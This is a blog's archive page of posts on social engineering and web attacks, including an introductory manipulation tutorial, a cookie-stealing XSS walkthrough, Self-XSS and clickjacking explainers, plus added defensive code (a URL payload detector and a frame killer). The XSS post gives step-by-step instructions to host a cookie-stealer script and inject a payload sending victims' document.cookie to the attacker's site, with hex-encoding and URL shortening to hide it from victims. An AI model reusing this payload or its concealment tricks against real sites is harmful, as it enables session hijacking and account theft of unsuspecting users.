Showing posts with label Social Engineering. Show all posts

Wednesday, April 4, 2012

The Art of Human Hacking - Social Engineering (SE) tutorial series



Hello BTS readers, here we come with an interesting tutorial written by my friend Mr. Ashish Mistry, who is the founder of Hcon and author of the 'HconSTF' project.


Hello all,

After a long time I have started writing again, in the hope that my belief in “sharing the spirit of learning” is well served. So from today I am going to write a series of tutorials on my favorite topic, 'Social Engineering' (SE).

We will start from a small intro to the very basics of what SE is, why you should learn and use it, and how it works, and as we go further in this series, we will look at 'leveraging SE into penetration testing'.

Disclaimer: The examples used in this tutorial series are partly my own and partly picked at random from the internet and social networks, so if any example accidentally matches your situation, no one can hold me responsible in any regard whatsoever. They are just examples for purely educational purposes, and I have no intention of offending anyone or anything.
These tutorials are for educational purposes only; you as the reader are solely responsible for whatever you do with the material published here, not the author and not the site.

So let's begin with the first tutorial on SE.

What is social engineering?
It's the art of manipulating humans.
In simpler words: 'tricking people so that they do what YOU want, or so that you get it done by them'.

Confused?

Let's take an example:
Suppose you go to a toyshop with your child, and your child wants a toy car, so he asks the salesperson to show him a car, perhaps one he has seen in the display. The salesperson shows that car, or, as they always do, starts with a costly car, and once the boy sees it he insists on that car only, because the salesperson showed off features like lights and a remote. But the toy car is too costly for this month's budget and the boy wants it anyhow, so you try to divert the child to some other car that is more within your budget. As he is a small child, he does not listen to you, and at the end of all this,
either you buy the costly car the child wanted, or he gets nothing, or he gets some other car.

Now you might ask me, “So what's new in this? It's very normal, every child does it, right?” But the point of this example is to show a perfectly crafted and executed 'social engineering attack' in our day-to-day life.
In the above example the social engineer was the shop's salesperson, who used the child to sell a costly car and get more money from you.

Basically the salesperson targeted the nature of the child, because he knows that once a child has been shown what he wants, it is very difficult for the parents to divert him, so he can sell what HE wanted to sell.

So if you understand basic exploitation terms, then:
  • Attacker = the salesperson
  • Vulnerability (weakness) = the child (actually a child's obvious nature)
  • Exploit (trick) = showing a more costly car and showing off more of its features to gain more of the child's attention
  • Payload (purpose) = more money from you
  • Target = yes, you guessed it right, it's YOU :)


Let's take another example:

This one is a simple but real-world example from Facebook:
a person shared this image of a quote from the honorable Mr. APJ Abdul Kalam.

It's good, right? He is proud of him or liked the quote, right?
But let's now try to understand it from an SE point of view.
There are some things to note in the photograph:
1. On the image, there is a website address.
2. Below the image, the website address is written again.

First let me tell you that the web address was not from any government site but from a private product trading site, which is totally unrelated to what the image is about, and marking the image with it is such a disrespectful thing for that person to do. Anyway,
why would anyone do this?

It is a very simple but clever kind of SE:
  • Attacker = whoever initially edited this photo to add the web address
  • Vulnerability (weakness) = the human nature of sharing and liking good photos/quotes
  • Exploit (trick) = the edited photo which has the quote
  • Payload (purpose) = marketing of his website, and reaching a bigger audience for his business for FREE
  • Target = anyone on Facebook who shares this photo

Another noticeable point is that when you see anything your mind likes, it gets stored somewhere in your mind, so when anyone around you asks or talks about property or trading, this site might flash into your mind.
Now, after this example, let's refine and add to our previous simple definition of SE.

"It's an art of manipulating people so that they do as you want or give you what you want from them, without any kind of physical offense. It's a whole psychological process of targeting other people's minds to gain their TRUST and exploiting it, using human weaknesses against the target by crafting SE attacks according to the kind of work we want to get done by others."

Hopefully you have now got the idea of social engineering (SE), and some things to start understanding and observing it. But every human and their psychological behavior is different; studying your target and crafting the attack according to your goal is going to give more success. One of the key things for this is the observation and quick-response abilities of the attacker or social engineer.

So who can be considered a social engineer?
It can be anyone, from a relative or friend convincing you to do or believe what they say, even if you don't want to do it or believe it.

It can be salespersons, marketing persons, thieves/con artists, your boss, penetration testers, forensics experts or anyone around you!

What's more, it is not a new thing; it has been used for centuries by different people, as you will see if you consider historical figures from your own nation.

Think about it: might you have been social engineered by someone, somewhere?

That's all for this first introductory tutorial.
If you have any questions, want to give any feedback, or want anything explained in this tutorial series, then please post in the comments.


Article author: Ashish Mistry
Article license: Social Engineering tutorials series by Ashish Mistry is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.

Tuesday, March 6, 2012

How to Fetch Username and Password by Social Engineering Technologies?


Security researcher Ankit Sharma, from the God of Hackers group (GOH), presented a video tutorial which explains how to do social engineering attacks using Backtrack.

Social engineering is commonly understood to mean the art of manipulating people into performing actions or divulging confidential information. While it is similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victims.

"Social engineering" as an act of psychological manipulation was popularized by hacker-turned-consultant Kevin Mitnick. The term had previously been associated with the social sciences, but its usage has caught on among computer professionals.


Tuesday, January 3, 2012

How to do Cookie Stealing with Cross Site Scripting Vulnerability?: XSS Tutorials



Hopefully you are now familiar with XSS vulnerabilities (if you don't know what they are, read the beginner's XSS tutorial). This is my fourth article about XSS vulnerability testing (pentesting). Today I am going to explain how an attacker exploits an XSS vulnerability to steal cookies from users.

Warning!!!
BTS does not take responsibility if anyone tries these hacks against any organization, trespasses its security measures and is brought under legal prosecution. This tutorial is intended for the improvement of security and for pentesting and investigations by legal security agencies.

Requirements:
  • A cookie Stealer code : Get it from here
  • Free Web hosting service
  • Basic Knowledge about XSS
  • Basic Knowledge about Computer Cookies
Cookie stealing is the process of exploiting an XSS vulnerability (non-persistent or persistent) to steal the cookie of a victim who visits the infected link. These cookies are then used to compromise the victim's account.

    Step 1: Creating the Cookie Stealer PHP file
    Get the cookie stealer from the link I mentioned. In that post, I explained three versions of the cookie stealer. We are going to use the third version.
    • Copy the code.
    • Open Notepad and paste the code.
    • Save the file with a .php extension
      Eg: Stealer.php
    Now create a new file and save it as log.txt (leave it blank). Don't change the name; this is the file name given in the PHP file.

    Now you will have two files:
    1. Stealer.php
    2. log.txt

    What exactly do these two files do?
    The Stealer.php file gets the IP address and cookie and stores the data in the log.txt file.
    The log.txt file holds the cookies and IP address details.

    Step 2:
    Register with a free web-hosting service and log in to your cPanel.
    Now open the File Manager in cPanel.
    Upload Stealer.php and log.txt to the root folder or public_html folder.

    Now the stealer will be at hxxp://www.YourSite.com/Stealer.php .

    Step 3: Exploiting the XSS Vulnerability
    So far, we have sharpened our saw. Now we are going to use it.
    Once you have set everything up and found a vulnerable site, inject the following code into the vulnerable site.

    <script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>
    For example:
    hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

    Cookie Stealing with Non-Persistent vs Persistent XSS:
    Persistent: if this code is injected into a site vulnerable to persistent XSS, it will stay there until the admin finds it. It will be shown to all users, so attackers don't need to send any link to others. Whoever visits the page becomes a victim.

    Non-Persistent:
    In the case of a non-persistent attack, the attacker sends the link to victims. Whenever they follow the link, it steals the cookie. Most sites are vulnerable to non-persistent XSS.

    In the non-persistent case, attackers send the injected link to victims.
    For example:
    hxxp://www.VulnerableSite.com/index.php?search=<script>location.href = 'http://www.Yoursite.com/Stealer.php?cookie='+document.cookie;</script>

    The above link clearly shows the script. Hackers can hex-encode this script so that the victim can't see it.
    For Example:
    hxxp://www.VulnerableSite.com/index.php?search=%3c%73%63%72%69%70%74%3e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%20%3d%20%27%68%74%74%70%3a%2f%2f%77%77%77%2e%59%6f%75%72%73%69%74%65%2e%63%6f%6d%2f%53%74%65%61%6c%65%72%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e
    Still, the link looks long. The attacker uses one more trick to hide the long URL: URL shortening sites. There are lots of sites that shorten a long URL into a tiny URL.

    For example:
    hxxp://www.tinyexample.com/twrwd63

    Once the victim follows the link, his cookie will be stored in the log.txt file.

    How to be secure from this attack?
    • Use the NoScript add-on. This is the best protection against XSS.
    • Never click shortened URLs.
    • Sometimes you may want to follow a shortened link. If so, clear all cookies in your browser and visit through a proxy or VPN (it will hide your IP).
    • (Later We will cover security tips for site admin , so stay tuned)
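A defensive counterpart to the hex-encoding trick described above, as an added example that is not part of the original post: it normalises percent-encoded query parameters and flags the script markers the encoding was meant to hide. The marker list, function names and sample URLs (on example.test hosts) are constructed for illustration.

```javascript
// Markers modelled on the payload shown in the post (assumed list, not exhaustive).
const MARKERS = {
  'script-tag': /<\s*script\b/i,
  'cookie-access': /document\s*\.\s*cookie/i,
  'redirect': /location\s*\.\s*href/i,
};

// Decode %XX escapes byte by byte, repeatedly, so double-encoded input is
// normalised too. Unlike decodeURIComponent this never throws on a malformed
// escape such as "%zz", so a broken escape cannot be used to skip inspection.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    const next = current.replace(/%([0-9a-fA-F]{2})/g,
      (m, hex) => String.fromCharCode(parseInt(hex, 16)));
    if (next === current) break; // nothing left to decode
    current = next;
  }
  return current;
}

// Return one finding per query parameter whose decoded value hits a marker.
function inspectUrl(url) {
  const q = url.indexOf('?');
  if (q === -1) return [];
  const findings = [];
  for (const pair of url.slice(q + 1).split('&')) {
    const eq = pair.indexOf('=');
    const param = eq === -1 ? pair : pair.slice(0, eq);
    const decoded = fullyDecode(eq === -1 ? '' : pair.slice(eq + 1));
    const hits = Object.keys(MARKERS).filter((k) => MARKERS[k].test(decoded));
    if (hits.length > 0) findings.push({ param, hits });
  }
  return findings;
}

// Constructed sample request URLs: benign, encoded, double-encoded, malformed.
const SAMPLES = [
  'http://shop.example.test/index.php?search=toy+cars&page=2',
  'http://shop.example.test/index.php?search=%3Cscript%3Elocation.href%3D%27' +
    'http%3A%2F%2Fcollector.example.test%2Fc%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E',
  'http://shop.example.test/index.php?q=%253Cscript%253Ealert(1)%253C%252Fscript%253E',
  'http://shop.example.test/index.php?search=50%zz%3Cscript%3E',
];

for (const url of SAMPLES) {
  console.log(JSON.stringify(inspectUrl(url)), url.slice(0, 60));
}
```

Matching markers after decoding is a triage aid for logs and filters; the fix for the site itself is still to encode user input on output.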

    Wednesday, November 16, 2011

    Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention


    Last time, I explained the clickjacking attack and its prevention. Today, I am going to explain the Self-XSS (Cross Site Scripting) attack.

    What is Self-XSS?
    Self-XSS is one of the popular social engineering attacks used by attackers to trick users into pasting malicious code into the browser. This results in the attacker gaining access to whatever website you visit. Usually scammers use this attack to trick users into buying products or to get money through online surveys.

    Recently, hackers attacked Facebook with explicit hardcore porn images. Facebook says it might be a Self-XSS attack.

    JavaScript can be executed in the browser URL bar.
    For example, enter the following code in your browser:
    javascript:alert('BreakTheSecurity');
    This will show a pop-up box with "BreakTheSecurity". An attacker can use this for malicious purposes. He can steal confidential data and cookies, redirect to malware sites and more.
    For example:
    Entering the following code will display the cookies in your browser:
    javascript:alert("Cookies:"+document.cookie+"  "+"\n By \n BreakTheSecurity");

    The above code does nothing malicious; it only displays the cookies. But an attacker can extend the script so that it takes advantage of your data.

    Security Tips from BreakTheSecurity:
    • Use the NoScript add-on, which will prevent JavaScript from running in your browser.
    • Don't click shortened URLs, for example: bit.ly/55ewEb?22. These may redirect to infected sites.
    Be aware of Social Engineering:
    • If anyone asks you (even if he is your friend) to paste scripts into the browser bar, never make this mistake.
    • If anyone says "Iphone only $10", don't be eager to click it.
    • If anyone says "1000 shares will cure a baby", never make this mistake. Facebook shares never help to raise money or to cure a baby.
    • Read our EHN spam report to know the latest updates about Facebook scams.
    God gave us the sixth sense; use it and think before you click any link or follow other instructions.

    Thursday, November 3, 2011

    What is Clickjacking Attack? How to Prevent? | UI Redressing


    Will answering a simple maths quiz delete your social network account? If your answer is "No", then check this news, Linkedin Clickjacking Vulnerability, and come back. Will visiting a website turn on your webcam? The answer is "Yes". Check this Flash player clickjacking vulnerability.

    If you read the above news completely, it will be easy for you to understand what clickjacking is. OK, let's continue with our article.
    Clickjacking, also known as UI redressing, is a malicious technique that tricks users into clicking a button or image that will run a hidden malicious script from another site.
    An attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the innocuous page. Thus the attacker hijacks the click for another website. That's why it is known as clickjacking (click + hijacking). The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008.

    Example:
    Let's take the real-world example of the "Linkedin clickjacking vulnerability".
    The above image may look like a simple maths problem. Once you click the submit button, it will delete your Linkedin account (if you are logged in) without asking any questions.

    A clickjacking attack can be used for:
    • Tricking users into turning on their webcam and microphone using this Adobe vulnerability (this security flaw has been fixed by Adobe)
    • Getting more Twitter followers
    • Posting on your Facebook wall
    • Deleting your profile

    Prevention Techniques:

    Client Side (security tips for users):
    Flash Player:
    Update your Flash Player (old versions are vulnerable to clickjacking).

    Browser Security Add-ons:
    NoScript:
    NoScript is a Mozilla add-on that provides protection against clickjacking, XSS and other malicious scripts. NoScript is also available for mobiles.

    Comitari Web Protection Suite: Comitari provides client side protection against ClickJacking (aka UI Redressing) attacks. Installed as browser add-on

    GuardedID: It is a commercial product which provides client-side clickjack protection for users of IE or Firefox without interfering with the operation of legitimate iFrames

    Server Side (for developers):
    Frame Killer:
    A framekiller is a JavaScript snippet that can be used in a web page to prevent it from being loaded inside frames from different sources. This can provide security against frame-based clickjacking.
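One way to write the frame killer described above, as an added example that is not code from the original post: the page starts hidden and is revealed only when it is the top-level window, so content stays hidden even if breaking out of the frame is blocked. The function name, the mock window helper and the example.test URLs are assumptions made so the logic can run outside a browser.

```javascript
// Frame killer over a window-like object. In a real page, ship
// <style>html{display:none}</style> in the head and call applyFrameKiller(window).
function applyFrameKiller(win) {
  const root = win.document.documentElement;
  if (win.self === win.top) {
    root.style.display = 'block'; // top-level page: reveal the content
    return 'shown';
  }
  // Framed: keep the content hidden and try to navigate the top window to us.
  root.style.display = 'none';
  try {
    win.top.location = win.self.location.href;
    return 'busted';
  } catch (e) {
    // Navigation refused (for example by a sandboxed frame): the page stays
    // hidden, so there is nothing visible to overlay and click through.
    return 'hidden';
  }
}

// Constructed stand-in for a browser window, used only for this demonstration.
function mockWindow(url, framed, topBlocksNavigation) {
  const win = {
    document: { documentElement: { style: { display: 'none' } } },
    location: { href: url },
  };
  win.self = win;
  if (!framed) {
    win.top = win;
    return win;
  }
  let topLocation = 'https://framing.example.test/';
  win.top = {};
  Object.defineProperty(win.top, 'location', {
    get() { return topLocation; },
    set(value) {
      if (topBlocksNavigation) throw new Error('SecurityError');
      topLocation = value;
    },
  });
  return win;
}

const PAGE = 'https://app.example.test/account';
console.log(applyFrameKiller(mockWindow(PAGE, false, false))); // top-level
console.log(applyFrameKiller(mockWindow(PAGE, true, false)));  // framed
console.log(applyFrameKiller(mockWindow(PAGE, true, true)));   // framed, blocked
```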

    Sunday, December 19, 2010

    Introduction to Social Engineering world | Hack the people



    What is Social Engineering?

    Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face with the victim.